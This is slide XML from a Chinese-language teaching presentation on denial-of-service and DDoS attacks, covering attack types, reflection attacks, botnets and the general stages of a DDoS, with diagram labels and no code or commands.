            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>利用网络协议或系统及应用漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>耗尽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>被攻击的计算机或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络的资源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击可用性，类型：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>资源耗尽型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>配置修改型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>基于系统缺陷型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>物理实体破坏型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288770" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>拒绝服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>(Denial of Service)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BC1593B0-D709-4625-B1DF-86D6EEB138D3}"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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>资源对抗：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击者使用攻击机的资源（时间、计算能力、网络带宽等）消耗受害者的资源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>简单</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击：单挑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用攻击者单机资源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>反射攻击：嫁祸</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用反射服务器的资源进行攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>反射服务：网络中能对服务或查询等请求进行应答的服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>分布式拒绝服务攻击：围殴</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>控制网络中的傀儡主机，僵尸网络，使用其资源进行攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>拒绝服务攻击的本质</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69635" name="灯片编号占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3A8CEF7F-E2C0-4D46-B177-FC6E805B1673}"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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>两个步骤：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻占代理主机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>向目标发起攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>具体步骤：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>探测扫描大量主机以寻找可入侵主机；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>入侵有安全漏洞的主机并获取控制权；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安装攻击所用的客户进程或守护进程；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>向客户进程发出命令，操纵代理主机进行协同入侵。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4098" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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mtClean="0"/>
              <a:t>通过植入代理程序，将多个存安全弱点的计算机（傀儡或肉鸡）联合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>起来作为攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>平台</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>者通过主控程序与代理程序的通信：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>同时向大量的代理程序发送攻击指令。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>操纵僵尸网络对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一个或多个目标发动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击，从而成倍地提高拒绝服务攻击的威力</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389122" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" smtClean="0"/>
              <a:t>僵尸网络</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AE7E26C8-B319-47C5-B7A9-EB9127DAEB48}"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1150938" y="617538"/>
            <a:ext cx="7793037" cy="755650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>分布式拒绝服务攻击(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600"/>
              <a:t>DDoS)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AE7E26C8-B319-47C5-B7A9-EB9127DAEB48}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1026" name="Object 0"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4267200" y="2286000"/>
          <a:ext cx="474663" cy="520700"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s646290" name="Photo Editor Photo" r:id="rId1" imgW="952500" imgH="1047750" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Photo Editor Photo" r:id="rId1" imgW="952500" imgH="1047750" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 646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2860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
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5181600" y="2971800"/>
          <a:ext cx="474663" cy="522288"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s646291" name="Photo Editor Photo" r:id="rId3" imgW="952500" imgH="1047750" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Photo Editor Photo" r:id="rId3" imgW="952500" imgH="1047750" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 6462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9718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2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4267200" y="4953000"/>
          <a:ext cx="471488" cy="519113"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s646292" name="Photo Editor Photo" r:id="rId4" imgW="952500" imgH="1047750" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Photo Editor Photo" r:id="rId4" imgW="952500" imgH="1047750" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 646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9530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3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5181600" y="4191000"/>
          <a:ext cx="479425" cy="527050"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s646293" name="Photo Editor Photo" r:id="rId5" imgW="952500" imgH="1047750" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Photo Editor Photo" r:id="rId5" imgW="952500" imgH="1047750" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 6462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1910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PPBand272"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="4572000"/>
            <a:ext cx="1066800" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻击者</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033" name="PPBand273"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="3505200"/>
            <a:ext cx="1347788" cy="261938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="1">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>各种客户主机</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="1">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1034" name="Picture 9" descr="desktoppc"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="3352800"/>
            <a:ext cx="692150" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1035" name="PPBand274"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="4191000"/>
            <a:ext cx="1143000" cy="287338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="de-DE" sz="1600" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>目标系统</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="de-DE" sz="1600" b="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389131" name="PPBand276"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2209800"/>
            <a:ext cx="1752600" cy="396875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="de-DE" sz="2000" b="1">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击准备</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="de-DE" altLang="zh-CN" sz="2000" b="1">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1037" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7848600" y="3429000"/>
            <a:ext cx="381000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389133" name="Picture 13" descr="skullt"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:lum bright="40000" contrast="40000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="2057400"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389134" name="Picture 14" descr="skullt"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:lum bright="40000" contrast="40000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
